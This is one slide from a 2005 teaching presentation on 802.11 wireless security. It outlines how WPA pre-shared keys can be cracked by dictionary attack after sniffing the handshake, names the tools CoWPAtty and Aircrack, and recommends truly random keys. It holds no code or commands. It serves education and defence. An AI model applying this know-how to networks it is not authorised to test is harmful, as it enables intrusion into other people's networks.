802.11 Wireless Attacks & Detection/Defense  Home ToC Prev Up Next 
802.11 overview
Attacks
O/S/M Vulnerabilities
WEP Encryption
Passive Attacks
Active Attacks
IV Replay Attack
Bit-flipping Attack
MITM Attack
Cisco LEAP
LEAP weaknesses
LEAP attack
+WPA PSK attacks
Detection
Defense
Conclusion
  

WPA PSK attacks

  • A PSK generated from a passphrase of less than about 20 characters is likely to be vulnerable to a dictionary attack

  • To perform the attack it is necessary to sniff two MAC addresses (of both sides), nonces and selected ciphersuite during the initial exchange

  • Since a single PSK is used for the whole ESS, the attacker can become a member of the ESS, and the whole ESS is compromised

  • WPA PSK should use only truly random keys!!!

  • Attack tools CoWPaaty and Aircrack

  • For a dictionary attack to be effective, it must take each dictionary word and perform 4096 iterations of HMAC-SHA1 with two nonce values and the supplicant and authenticator MAC addresses - too slow (approximately 70 words/second on a Pentium 4 3.8 GHz system)
Copyright © 2005 Pavol Lupták, ICZ a.s.  Prev Next